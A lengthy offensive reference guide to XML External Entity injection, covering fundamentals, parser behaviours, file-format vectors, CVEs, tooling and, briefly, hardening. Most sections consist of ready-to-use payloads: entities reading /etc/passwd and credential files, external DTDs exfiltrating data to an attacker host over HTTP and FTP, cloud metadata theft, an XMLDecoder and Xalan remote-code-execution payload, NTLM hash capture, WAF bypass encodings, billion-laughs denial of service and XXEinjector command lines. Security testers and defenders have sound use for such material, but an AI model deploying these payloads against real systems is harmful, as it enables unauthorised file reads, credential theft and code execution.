Comprehensive XXE Guide

A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 40 research sources.


Table of Contents

  1. Fundamentals
  2. Attack Surface & Entry Points
  3. Classic In-Band XXE
  4. Blind XXE via External DTD
  5. Error-Based XXE
  6. Parameter Entities & Local DTD Chains
  7. XXE → SSRF Pivoting
  8. XXE → File Read & Information Disclosure
  9. XXE → RCE
  10. Parser-Specific Behaviors
  11. XML File-Format Vectors
  12. WAF & Filter Bypasses
  13. Denial of Service
  14. Real-World CVEs & Chains
  15. Tooling
  16. Detection & Prevention
  17. Payload Quick Reference

1. Fundamentals

XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE.

Three classes:

ClassDescriptionExample
In-BandEntity value reflected directly in responseXML-to-JSON converters, stock-lookup APIs
Blind / OOBNo reflection — data exfiltrated via DNS/HTTP/FTP to attacker DTDSVG/DOCX processors, async workers
Error-BasedContent leaked through parser exception messagesSpring Boot 500 handlers, lxml XMLSyntaxError

Impact spectrum: DNS/HTTP callback → Arbitrary file read → Source code disclosure → Cloud metadata / IMDS token theft → Internal service enumeration → Credential capture (SMB hash) → Remote code execution (PHP expect, Java XMLDecoder, XSLT).

1.1 The XML DTD primer

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ELEMENT root ANY>
  <!ENTITY internal "literal value">
  <!ENTITY external SYSTEM "file:///etc/passwd">
  <!ENTITY % param  SYSTEM "http://attacker/evil.dtd">
]>
<root>&external;</root>
  • <!DOCTYPE …> — declares the document type and internal subset.
  • <!ELEMENT …> — declares allowed element structure (rarely required).
  • <!ENTITY name "value">general entity, referenced as &name; inside the document body.
  • <!ENTITY name SYSTEM "URI">external general entity, parser fetches the URI.
  • <!ENTITY % name …>parameter entity, referenced as %name; inside the DTD only. Cannot appear inside the document body.
  • %name; inside the internal subset is the primitive behind blind and error-based XXE.

1.2 Entity reference rules that matter for exploitation

  1. A general entity (&x;) can only reference text, not other SYSTEM identifiers. <!ENTITY x SYSTEM "http://host/?q=&y;"> is illegal.
  2. Parameter entities (%x;) can be used to concatenate text into other declarations — the basis of the “evil.dtd” trick.
  3. You cannot reference a parameter entity from within the same internal subset declaration it’s defined in — hence external DTDs are used to host the indirection.
  4. Systems that blend internal + external DTDs allow redefinition of an entity originally declared externally — the key to local-DTD / error-based chains.
  5. SYSTEM URIs may be file://, http://, https://, ftp://, gopher://, jar:, netdoc:, data:, php://…, expect://.

1.3 Why it’s still everywhere

  • XML is deep in legacy plumbing (SOAP, SAML, WS-Security, XMPP, RSS/Atom, Office Open XML, SVG, XLIFF, XMP, RDF, PDF metadata, Kubernetes API fallback, Android app processing).
  • Many parsers still default to permissive DTD handling (libxml2 with LIBXML_DTDLOAD | LIBXML_NOENT, Java SAX/DOM prior to JDK 13 hardening, .NET Framework 4.5.1 and earlier, old Nokogiri).
  • “JSON only” APIs often accept XML via Content-Type: application/xml or text/xml as an undocumented fallback — valuable injection points.
  • File-format fuzzers routinely uncover XXE in image/document processors that unzip Office documents behind the scenes.

2. Attack Surface & Entry Points

2.1 Request-level sinks

CategoryExamples
XML request bodiesContent-Type: application/xml, text/xml, application/soap+xml, application/xliff+xml
JSON → XML conversionAPIs that accept both; toggle Content-Type: application/xml on a JSON endpoint
SOAP / WS- endpoints*Legacy integrations, admin APIs, invoice/billing, enterprise middleware
SAML SSOSAMLResponse, AuthnRequest, IdP metadata upload
RSS / Atom feeds“Import feed”, link preview, social aggregators
File uploadsSVG avatars, DOCX/XLSX/PPTX importers, XMP images, EPUB, XLIFF, XFA PDF forms
XInclude pointsServer-side XML templating where the DOCTYPE can’t be controlled but XML fragments can
Webhook/CIXML build manifests, Maven POM, Gradle module metadata, .csproj, .xib, .storyboard
Printer/orchestration APIsJMF (Job Messaging Format) on port 4004, XFDF, Xerox FreeFlow
SCADA / industrialBatch job XML, OPC UA fallback, manufacturing execution systems

2.2 Code-level sinks

Java     javax.xml.parsers.DocumentBuilderFactory / SAXParserFactory
         javax.xml.transform.TransformerFactory
         javax.xml.validation.SchemaFactory
         javax.xml.stream.XMLInputFactory
         javax.xml.xpath.XPathFactory
         java.beans.XMLDecoder          -- deserialization → RCE
         org.jdom2.input.SAXBuilder
         org.dom4j.io.SAXReader
.NET     System.Xml.XmlDocument (with XmlUrlResolver)
         System.Xml.XmlTextReader       -- pre-4.5.2 defaults dangerous
         System.Xml.XmlReader + XmlReaderSettings { DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }
         System.Xml.XPath.XPathDocument
         System.Xml.Linq.XDocument (pre-4.5.2)
         System.Xml.Serialization.XmlSerializer
Python   xml.etree.ElementTree          -- safe by default for entities, still fetches DTDs via lxml
         lxml.etree (libxml2)           -- parameter-entity XXE until 5.4.0
         xml.dom.minidom
         xml.sax
         xmltodict                      -- wraps expat
PHP      libxml (SimpleXMLElement, DOMDocument, XMLReader)
         -- LIBXML_NOENT enables entity substitution (dangerous)
Ruby     Nokogiri                       -- DTDLOAD/NOENT opt-in required
         REXML                          -- XML bomb protection, still resolves ENTITY
Node.js  libxmljs, xml2js (with explicitArray/DOCTYPE allowed), xmldom, fast-xml-parser
Go       encoding/xml                   -- does not resolve SYSTEM, generally safe

2.3 Content-Type smuggling

If a POST endpoint accepts JSON, try swapping the body:

POST /api/order HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://collab/xxe">]>
<order><item>&x;</item></order>

Burp extension Content Type Converter automates the JSON→XML flip.


3. Classic In-Band XXE

When the parser reflects the entity value in the HTTP response, file disclosure is one request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
  <storeId>1</storeId>
</stockCheck>

When the parser rejects undeclared elements, add an ANY declaration:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ELEMENT stockCheck ANY>
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&file;</productId>
</stockCheck>

3.1 XInclude — DOCTYPE-less injection

Useful when the server builds the outer XML and only lets you inject a small fragment (e.g. a productId field that is inlined into a SOAP envelope):

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Requires an XInclude-aware parser. In Java: DocumentBuilderFactory.setXIncludeAware(true) or XOM/dom4j defaults.

3.2 Directory listing (Java file:// quirk)

libxml2 and the Java file: URL handler list directory contents when the URI points at a folder:

<!DOCTYPE r [<!ENTITY dir SYSTEM "file:///etc/">]>
<r>&dir;</r>

Java returns a newline-separated listing; libxml2 returns a text rendering. Use for filesystem enumeration before switching to targeted reads.


4. Blind XXE via External DTD

No reflection? Force the parser to fetch an attacker-hosted DTD and chain parameter entities.

4.1 Step 1 — prove external connectivity

<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY % ping SYSTEM "http://collab.example/"> %ping;]>
<r/>

If the Burp Collaborator / interact.sh receives a hit, the parser resolves parameter entities and will fetch remote DTDs.

4.2 Step 2 — chain a parameter entity for OOB exfil

Hosted at http://attacker/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker/x?d=%file;'>">
%eval;
%exfil;

Victim payload:

<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY % xxe SYSTEM "http://attacker/evil.dtd"> %xxe;]>
<r/>

Flow: victim parser fetches evil.dtd → defines %file%eval builds %exfil dynamically → %exfil makes an HTTP GET with the file contents in the query string.

4.3 FTP for multi-line files

HTTP URL parsers strip newlines. For files like /etc/passwd use FTP, where the file contents ride as the password in the URI:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'ftp://a:%file;@attacker/x'>">
%all;
%send;

Pair with a dummy FTP listener (e.g. ONsec xxe-ftp-server.rb) that logs the PASS command without actually handshaking.

4.4 Gopher (legacy Java ≤ 1.7)

<!ENTITY % send SYSTEM "gopher://attacker:1337/?%file;">

Effectively extinct in modern deployments but still useful on embedded Java or ancient appliances.

4.5 DNS-only exfiltration

When only outbound DNS is allowed, encode one file-byte per subdomain via iterative XXE or use a tool like XXEinjector to chunk. For simple fingerprinting a bare DNS lookup is enough:

<!ENTITY % p SYSTEM "http://$(id).dns.attacker.tld/">

5. Error-Based XXE

Used when OOB is blocked (egress filtered) but the app surfaces parser errors.

5.1 External-DTD error variant

<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

The parser tries to open file:///nonexistent/<contents of /etc/passwd>, fails, and embeds the missing-path string in the exception thrown back to the client.

5.2 Purely local (no egress) — local DTD trick

PortSwigger / Arseniy Sharoglazov’s technique: find a DTD that already exists on the server filesystem whose entities can be redefined from the internal subset.

Canonical example (GNOME yelp):

<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<r/>

%ISOamso; is redefined to inject additional declarations; when %local_dtd; is expanded the injected entities fire and produce the error.

Other high-hit local DTDs (see GoSecure dtd-finder for full list):

PathOverridable entity
/usr/share/yelp/dtd/docbookx.dtdISOamso
/usr/share/xml/fontconfig/fonts.dtdconstant
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtdvarious
/opt/IBM/WebSphere/AppServer/properties/schemas/j2ee/XMLSchema.dtdWebSphere
/usr/share/java/xalan2.jar!/org/apache/xalan/res/XSLTInfo.propertiesXalan
C:\Windows\System32\wbem\xml\cim20.dtdWindows

Brute-force the DTD path with Intruder using the dtd_files.txt wordlist from the GoSecure repo.

5.3 GoSecure dtd-finder

java -jar dtd-finder.jar /path/to/docker-image.tar

Scans a tarball/Docker image for DTDs and automatically identifies entities that can be overridden. Point at the target’s base image to build a custom payload list.


6. Parameter Entities & Local DTD Chains

Understanding the parameter-entity gymnastics is essential because almost every advanced XXE variant boils down to:

  1. Define %file that reads the target.
  2. Define %eval that — when expanded — declares a third entity whose URI concatenates %file’s value.
  3. Expand %eval, then expand the generated entity.

6.1 Character-reference encoding

Because % and & inside the internal subset are parsed immediately, you must delay their evaluation. Use character references:

LiteralDelayed form
%&#x25;
&&#x26;
&#x25; (one more level)&#x26;#x25;

Rule of thumb: each layer of delayed expansion adds one more &#x26; wrap.

6.2 Double-encoded payload template

<!ENTITY % outer '
  <!ENTITY &#x25; file   SYSTEM "file:///flag">
  <!ENTITY &#x25; wrap   "<!ENTITY &#x26;#x25; leak SYSTEM &#x27;http://a/?x=&#x25;file;&#x27;>">
  &#x25;wrap;
  &#x25;leak;
'>
%outer;

6.3 lxml “meow://” trick (libxml2 bypass of 5.4.0 hardening)

lxml ≥ 5.4.0 blocked error-parameter entities, but general entities built from parameter entities still leak via a bogus scheme:

<!DOCTYPE colors [
  <!ENTITY % a '
    <!ENTITY % file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY % b "<!ENTITY c SYSTEM &#x27;meow://%file;&#x27;>">
  '>
  %a; %b;
]>
<colors>&c;</colors>

The parser reports failed to load external entity "meow://FLAG{secret}" — flag in error message, no egress needed.

Fixed in lxml ≥ 5.4.0 and libxml2 ≥ 2.13.8. Either alone is not sufficient.


7. XXE → SSRF Pivoting

Every XXE is an SSRF primitive. The http:// scheme inside a SYSTEM URI forces the server to issue an outbound request.

7.1 Cloud metadata exfil

AWS (IMDSv1):

<!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

GCP:

<!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">

Note: GCP IMDS requires Metadata-Flavor: Google header — XXE typically can’t set request headers, so GCP is usually a dead end unless the parser uses a custom HTTP client that forwards request headers.

Azure IMDS:

<!ENTITY az SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">

Azure also requires Metadata: true header — usually blocked, same caveat as GCP.

IMDSv2 on AWS requires a PUT to get a token — blocks naive XXE. If the backend still permits IMDSv1 via HttpTokens=optional, exploitation stays trivial.

7.2 Internal port scan / service enumeration

Error/response timing differences reveal open vs closed ports:

<!ENTITY scan SYSTEM "http://10.0.0.5:6379/">

Redis/Memcached/Elasticsearch without auth can sometimes be driven via gopher smuggling, though XXE alone lacks CRLF control.

7.3 JMF / print orchestration (Xerox FreeFlow Core)

Real case: a JMF listener on TCP/4004 parsed XML without hardening. A crafted JMF DOCTYPE with a SYSTEM entity caused the server to issue outbound HTTP, confirming SSRF. Chained with a subsequent path traversal, it led to unauthenticated RCE.

<?xml version="1.0"?>
<!DOCTYPE JMF [<!ENTITY probe SYSTEM "http://collab/oob">]>
<JMF SenderID="t" Version="1.3"><Query Type="KnownMessages">&probe;</Query></JMF>

8. XXE → File Read & Information Disclosure

8.1 High-value target files (Linux)

/etc/passwd               /etc/shadow (rarely readable)
/etc/hosts /etc/resolv.conf
/proc/self/environ        env vars, often contain secrets & tokens
/proc/self/cmdline        full process command line
/proc/self/cwd/<file>     relative-path access
/proc/self/net/tcp        open sockets
/proc/self/status
/proc/version /etc/issue  fingerprinting
/proc/1/maps              memory mappings
/root/.ssh/id_rsa /root/.aws/credentials  if root-run
/var/lib/kubelet/config.yaml
/run/secrets/kubernetes.io/serviceaccount/token

8.2 Windows

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Windows\System32\inetsrv\config\applicationHost.config
file://attacker-smb-share/a.jpg  → NetNTLMv2 hash capture via Responder

8.3 Binary & non-ASCII file read

Raw file:// breaks on non-XML-safe bytes. Wrap in base64 via PHP filter:

<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">

Java: wrap the read inside a CDATA block via a two-stage entity construction (XXEinjector --cdata mode).

8.4 Source code recovery

PHP filters cover the filesystem; combine with .git/config, .svn/wc.db, composer.json, framework configs to rebuild source trees.


9. XXE → RCE

9.1 PHP expect:// wrapper

If the expect extension is loaded:

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]>
<r>&x;</r>

Rare in the wild — pecl expect is almost never deployed — but still worth testing when PHP fingerprint is confirmed.

9.2 Java XMLDecoder deserialization

java.beans.XMLDecoder.readObject() processes XML that instantiates arbitrary classes. If an app exposes it to user input, it’s instant RCE (not strictly XXE but frequently conflated because the entry point is XML).

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <array class="java.lang.String" length="3">
        <void index="0"><string>/bin/sh</string></void>
        <void index="1"><string>-c</string></void>
        <void index="2"><string>id &gt; /tmp/p</string></void>
      </array>
    </void>
  </object>
</java>

Real CVE targets: Oracle WebLogic CVE-2017-10271, Restlet XMLDecoder endpoints.

9.3 XSLT → Java RCE via Xalan

If you can control a stylesheet (or feed XSLT to a Transformer):

<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
  xmlns:str="http://xml.apache.org/xalan/java/java.lang.String">
  <xsl:template match="/">
    <xsl:variable name="cmd">touch /tmp/pwn</xsl:variable>
    <xsl:variable name="rt" select="rt:getRuntime()"/>
    <xsl:variable name="p"  select="rt:exec($rt,$cmd)"/>
  </xsl:template>
</xsl:stylesheet>

Default-enabled on Java’s Xalan until JDK 15 introduced jdk.xml.enableExtensionFunctions=false.

9.4 jar: protocol → file-write → RCE chain

Java’s jar:http://… handler downloads a ZIP to /tmp/…, extracts it, reads a member, then deletes the archive. Hanging the HTTP server indefinitely keeps the temp file alive. Combined with a second vulnerability (LFI, template injection, deserialization, XSLT upload) this yields RCE.

<!ENTITY x SYSTEM "jar:http://attacker:8080/evil.zip!/marker.txt">

Workshop tooling: slow_http_server.py / slowserver.jar from GoSecure xxe-workshop.

9.5 NetNTLMv2 capture (Windows)

<!ENTITY x SYSTEM "file:////attacker/share/a.jpg">

Point Responder.py -I eth0 at the listener, capture the NetNTLMv2 hash, crack with hashcat -m 5600.


10. Parser-Specific Behaviors

10.1 libxml2 (PHP, Python lxml, Ruby Nokogiri, many C/C++ apps)

  • External entity resolution is off by default since 2.9.0 unless LIBXML_NOENT or LIBXML_DTDLOAD is set.
  • PHP’s libxml_disable_entity_loader(true) was the historical fix (deprecated in PHP 8).
  • Parameter-entity expansion continued even with “safe” settings until 2.13.8.
  • Directory listing via file:///etc/ supported.

10.2 Xerces (Java SAX/DOM)

  • DocumentBuilderFactory / SAXParserFactory still default to entity resolution enabled unless features explicitly disabled.
  • Hardening flags (all must be set):
    • http://apache.org/xml/features/disallow-doctype-decltrue (best defence)
    • http://xml.org/sax/features/external-general-entitiesfalse
    • http://xml.org/sax/features/external-parameter-entitiesfalse
    • http://apache.org/xml/features/nonvalidating/load-external-dtdfalse
    • FEATURE_SECURE_PROCESSINGtrue
    • setXIncludeAware(false); setExpandEntityReferences(false)
  • TransformerFactory, SchemaFactory, XPathFactory, Validator, SAXTransformerFactory each need independent hardening via ACCESS_EXTERNAL_DTD / ACCESS_EXTERNAL_STYLESHEET / ACCESS_EXTERNAL_SCHEMA.

10.3 .NET

APIDefault (pre-4.5.2)Default (4.5.2+)
XmlDocumentXmlUrlResolver present — vulnerableXmlResolver = null — safe
XmlTextReaderProhibitDtd = false — vulnerableDtdProcessing = Prohibit — safe
XmlReader (via XmlReader.Create)DtdProcessing = Prohibit — safesafe
XPathDocumentdangerousfixed
XDocument / XElementuses XmlReader internally — generally safesafe

Always dangerous regardless of version: setting XmlResolver = new XmlUrlResolver() or DtdProcessing = Parse with non-null resolver.

Look for these patterns in C# code review:

var rdr = new XmlTextReader(input);
rdr.XmlResolver = new XmlUrlResolver();           // BAD
rdr.DtdProcessing = DtdProcessing.Parse;          // BAD

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Parse,          // BAD
    XmlResolver  = new XmlUrlResolver(),          // BAD
    MaxCharactersFromEntities = 0                 // enables unbounded billion-laughs
};

Real CVE: CVE-2025-27136 in the LocalS3 Java S3 emulator used a default DocumentBuilderFactory on the CreateBucketConfiguration endpoint, letting unauthenticated attackers read /etc/passwd.

10.4 Python lxml

  • Safe mode: etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True).
  • Parameter-entity XXE viable before lxml 5.4.0 / libxml2 2.13.8, even with resolve_entities=False, when load_dtd=True.
  • defusedxml package monkey-patches stdlib/lxml to block DOCTYPE entirely — recommended.

10.5 Nokogiri (Ruby)

  • Safe by default. Dangerous only when DTDLOAD | NOENT passed:
    Nokogiri::XML(input) { |c| c.dtdload.noent }   # BAD
    
  • REXML::Document — inherits from ruby-stdlib; patches since 2013 cap recursion but general entities still expand.

10.6 Go encoding/xml

  • Does not resolve SYSTEM entities. Historically considered safe.
  • Custom decoders (etree, html-xml-tools) can still be coaxed to fetch DTDs — review any third-party XML lib on Go.

11. XML File-Format Vectors

Any file whose internals contain XML is an XXE delivery vehicle.

11.1 SVG (file upload)

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="200">
  <text>&x;</text>
</svg>

Or <image xlink:href="file:///etc/hostname"/>. Works against ImageMagick (prior to policy.xml hardening), librsvg, Inkscape, Apache Batik, many cloud image processors.

11.2 Office Open XML (DOCX, XLSX, PPTX)

  1. unzip foo.docx -d foo/
  2. Edit foo/word/document.xml (or xl/workbook.xml) — insert <!DOCTYPE …> with payload between the XML prolog and the root element.
  3. cd foo && zip -r ../evil.docx .
  4. Upload to the target’s document-processing feature (resume parsers, invoice ingest, doc-to-PDF).

11.3 XLIFF (translation files)

Apache Tika, Okapi, XLIFF Toolbox. Example that worked against a Java 1.8 parser (see clipped article):

<?xml version="1.0"?>
<!DOCTYPE XXE [<!ENTITY % remote SYSTEM "http://attacker/evil.dtd"> %remote;]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"/>

11.4 PDF (XFA forms, XMP metadata)

Acrobat XFA forms wrap XML; PDF metadata (/Metadata stream) carries an XMP packet. Many server-side PDF handlers (iText, PDFBox, Ghostscript) parse these.

11.5 EPUB, ODF

EPUB is a ZIP containing XHTML + OPF XML. ODF (LibreOffice) is a ZIP of content.xml / styles.xml. Both have historical XXE CVEs in reader software.

11.6 SVG / MathML embedded in HTML

If an HTML sanitizer passes SVG through unchanged and a later stage parses it with an XML parser, XXE is reachable even when the primary input is HTML.

11.7 SOAP envelopes

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo><![CDATA[<!DOCTYPE d [<!ENTITY % r SYSTEM "http://a/e.dtd"> %r;]><d/>]]></foo>
  </soap:Body>
</soap:Envelope>

CDATA wrapping sometimes bypasses outer sanitization.

11.8 SAML

SAMLResponse XML is base64-encoded before transport — decode, inject DOCTYPE, re-encode. Signature validation may invalidate the payload unless the IdP-trust relationship allows a re-signed document; however many SPs parse the XML before signature verification (classic XSW-style bugs), making XXE trivially reachable.

11.9 RSS / Atom

Feed-ingest services (Feedly-like, Slack preview bots, Hootsuite) routinely fetch user URLs and parse RSS. Host a poisoned feed and wait.

11.10 Android / iOS asset bundles

Android manifest, .xib, .storyboard, .plist (XML variant) — XXE reached via supply-chain build tooling has produced numerous CI takeovers.


12. WAF & Filter Bypasses

12.1 Encoding

  • UTF-7 / UTF-16: re-encode payload, declare encoding="UTF-7" in the prolog. Many WAFs only inspect UTF-8.
  • HTML numeric entities inside the DTD to obscure the DOCTYPE/ENTITY keywords (the parser resolves them before interpreting).
  • Comment injection: <!-- inside DTDs is not allowed, but CDATA and character refs are -->.

12.2 Scheme alternatives

BlockedAlternative
file:///etc/passwdnetdoc:///etc/passwd (Java)
file://jar:file:///
http://https://, ftp://, gopher://
SYSTEM keyword filteredPUBLIC "-//W3C//DTD..." "URI" — PUBLIC identifiers also trigger fetches

12.3 data:// smuggling

<!DOCTYPE r [<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init;]><r/>

If the parser resolves data: URIs, the base64 inside decodes at parse time and effectively imports an arbitrary DTD payload past string-based filters.

12.4 Nested general-entity bypass via HTML entities

From Ambrotd/XXE-Notes — obfuscate the inner ENTITY so regex filters on SYSTEM and &#37; don’t match:

<!DOCTYPE foo [
  <!ENTITY % a "<&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;http://a/e.dtd&#x22;&#x3E;">
  %a;%dtd;
]>
<data><env>&exfil;</env></data>

12.5 WrapWrap / Lightyear PHP tricks

Swarm’s “Impossible XXE in PHP” demonstrated chaining php://filter chains (convert.iconv.*) to bypass strict <?xml / <!DOCTYPE byte filters by generating the required bytes via iconv transformations inside the filter chain itself. Highly situational but lethal when the simpler bypasses fail.


13. Denial of Service

13.1 Billion Laughs

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

9 levels = ~10⁹ expansions, gigabytes of memory.

13.2 Quadratic blowup

One giant entity ("A" * 100000) referenced 10,000 times. Bypasses entityExpansionLimit in some parsers because it’s a single entity.

13.3 External resource DoS

<!ENTITY x SYSTEM "http://slowloris.internal/never-closes">
<!ENTITY y SYSTEM "file:///dev/urandom">
<!ENTITY z SYSTEM "file:///dev/zero">

Each forces the server thread to hang — cheap resource exhaustion.

13.4 YAML variant (“Billion Lols” in YAML)

YAML anchors/aliases have the same problem. Any parser that re-dereferences aliases recursively is vulnerable. Real case: Visual Studio 2022 consumed 100 GB of RAM on a crafted XAML file (XEE — XML Entity Expansion).


14. Real-World CVEs & Chains

CVEProductNotes
CVE-2014-3660libxml2Entity expansion amplification fix
CVE-2017-10271Oracle WebLogicwls-wsat XMLDecoder → unauth RCE
CVE-2018-1000840Apache BatikSVG xlink:href="file://" disclosure
CVE-2019-17571Apache log4j 1.2 SocketServerXML deserialization
CVE-2020-5245dropwizard-validationXXE via Jersey XmlProvider
CVE-2021-33813JDOMSAXBuilder external DTD
CVE-2021-34429Eclipse JettyXML file list through XInclude
CVE-2022-1471SnakeYAML (XEE cousin)tag-based RCE via typed deserialisation
CVE-2023-34034Spring SecuritySAML XXE pre-signature
CVE-2024-22257Spring SecuritySAML signature XXE
CVE-2025-27136LocalS3 (Java S3 emulator)DocumentBuilderFactory default → unauth file read on CreateBucketConfiguration
CVE-2025-49493Akamai CloudTestXXE in test-case import allowing file read
CVE-2025-68493Apache StrutsXXE in action XML configuration parsing
CVE-2026-29924Grav CMS ≤ 1.7.xAdmin-panel SVG upload → authenticated XXE, file read + SSRF
Cisco ISEIdentity Services EngineXXE in external-identity integration XML
Xerox FreeFlow CoreJMF listener on :4004DOCTYPE allowed → unauth SSRF + path traversal → RCE
Horizon3 “Support Ticket to 0-day”FreeFlow CoreFull exploit chain write-up: XXE → SSRF → path traversal → RCE

14.1 Honoki — blind XXE to root file read

Creative chain: OOB XXE used to enumerate /proc/self/environ, leaked a service credential, which unlocked a privileged endpoint that returned the filesystem root. Illustrates that initial “boring” file read often unlocks higher-privilege primitives.

14.2 Bugcrowd / H1 patterns

Recurring paid reports:

  • SVG avatar → XXE file read on Rails / Node image processors.
  • DOCX import → blind OOB XXE on HR/ATS platforms.
  • SAML metadata upload → admin-role XXE on Okta-competitor SSO.
  • XLSX bulk-import → XXE reading /proc/self/environ → DB credential disclosure.

15. Tooling

15.1 XXEinjector (Ruby)

Automates direct + OOB exploitation. Highlights:

  • OOB methods: FTP (default), HTTP, gopher (Java ≤ 1.7).
  • Directory enumeration (Java) or file brute-forcing (any).
  • Second-order: sends the XXE in one request, reads it back from a second.
  • --phpfilter auto-wraps reads in php://filter/convert.base64-encode.
  • --hashes triggers SMB to steal NetNTLMv2.
  • --expect uses PHP expect wrapper for RCE.
  • --upload uses jar: to drop files in temp dir.
  • --xslt tests for XSLT injection.
ruby XXEinjector.rb --host=10.0.0.2 --path=/etc --file=req.txt --oob=http
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --phpfilter --brute=files.txt
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --hashes

15.2 XXExploiter (Node/TS — luisfontes19)

Generates payloads and serves the companion HTTP/FTP infrastructure in one go. Useful when you don’t want to stand up separate listeners.

15.3 BuffaloWill/oxml_xxe

Embeds XXE payloads into DOCX/XLSX/SVG/GPX/XMP/EPUB/IDML/PDF/HWP wrappers automatically. One-click for file-format vectors.

15.4 GoSecure dtd-finder

java -jar dtd-finder.jar target-image.tar

Scans Docker images / tarballs for DTD files and identifies overridable entities — indispensable for error-based local-DTD attacks.

15.5 defusedxml (Python)

Defensive. Monkey-patches xml.etree, lxml, xml.sax, xmlrpc to forbid DOCTYPE, external entities, and entity-expansion bombs. Use in any Python codebase handling untrusted XML.

15.6 Burp Suite extensions

  • Content Type Converter — flip JSON requests to XML/YAML.
  • HackVertor — tag-based encoding for rapid payload mutation.
  • XXE-Hunter — auto-detect XXE in requests with XML bodies.
  • Reissue Request Scripter — build Python scripts for iterative XXE file reads.
  • Burp Collaborator — essential OOB endpoint.

15.7 OOB infrastructure

  • Burp Collaborator (paid).
  • interact.sh / interactsh-client from ProjectDiscovery (free).
  • canarytokens.org for one-shot DNS tokens.
  • Dummy FTP for password-channel exfil: ONsec xxe-ftp-server.rb.
  • slow_http_server.py / slowserver.jar for jar: chain abuse.

16. Detection & Prevention

16.1 Static analysis patterns

Search for any XML parser instantiation not accompanied by hardening flags:

Java    DocumentBuilderFactory.newInstance()     # without setFeature hardening
        SAXParserFactory.newInstance()
        TransformerFactory.newInstance()
        SchemaFactory.newInstance()
        XMLInputFactory.newFactory()
        SAXReader                                # dom4j
        SAXBuilder                               # jdom2
        java.beans.XMLDecoder                    # RCE risk

.NET    new XmlDocument()                        # check .XmlResolver assignments
        new XmlTextReader(...)                   # check .DtdProcessing & .XmlResolver
        new XmlReaderSettings { DtdProcessing = DtdProcessing.Parse }
        XmlSerializer.Deserialize(stream)

Python  lxml.etree.XMLParser(load_dtd=True)
        lxml.etree.XMLParser(resolve_entities=True)
        xml.sax.make_parser()                    # use defusedxml instead
        xml.dom.pulldom / xml.etree              # inspect parser flags

PHP     simplexml_load_string($x, null, LIBXML_NOENT | LIBXML_DTDLOAD)
        DOMDocument::loadXML($x, LIBXML_NOENT)
